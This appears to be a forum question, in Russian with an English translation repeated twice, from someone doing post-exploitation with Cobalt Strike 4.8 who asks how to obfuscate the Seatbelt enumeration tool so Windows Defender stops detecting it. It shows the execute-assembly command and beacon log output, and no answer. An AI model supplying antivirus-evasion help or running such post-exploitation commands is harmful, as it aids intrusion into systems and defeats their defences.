Received initial access and began the Post-Exploitation with Cobalt Strike 4.8. I wanted to start the list with Seatbelt. After performing Seatbel.exe was discovered by Windows Defender and removed.
Меня интересует вопрос: как сделать так, чтобы Seatbelt не был обнаружен? Есть ли какие-нибудь способы обфускации?
Вот команда, которую я использовал в Cobalt Strike 4.8
execute-assembly /path/to/Seatbelt.exe -group=all
Выходные данные:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b
------ENGLISH VERSION------
How to make the Ghost Binary "Seatbelt.exe" undetected for Cobalt Strike 4.8
Got initial access and started the Post-Exploitation phase with Cobalt Strike 4.8. I wanted to start enumeration with Seatbelt. After executing, the Seatbel.ex was denuded by Windows Defender and then deleted.
My question is: How do I make Seatbelt undetected? are there any obfuscating ways?
This is the command I used in Cobalt Strike 4.8
execute-assembly /path/to/Seatbelt.exe -group?all
The Output:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b
Меня интересует вопрос: как сделать так, чтобы Seatbelt не был обнаружен? Есть ли какие-нибудь способы обфускации?
Вот команда, которую я использовал в Cobalt Strike 4.8
execute-assembly /path/to/Seatbelt.exe -group=all
Выходные данные:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b
------ENGLISH VERSION------
How to make the Ghost Binary "Seatbelt.exe" undetected for Cobalt Strike 4.8
Got initial access and started the Post-Exploitation phase with Cobalt Strike 4.8. I wanted to start enumeration with Seatbelt. After executing, the Seatbel.ex was denuded by Windows Defender and then deleted.
My question is: How do I make Seatbelt undetected? are there any obfuscating ways?
This is the command I used in Cobalt Strike 4.8
execute-assembly /path/to/Seatbelt.exe -group?all
The Output:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b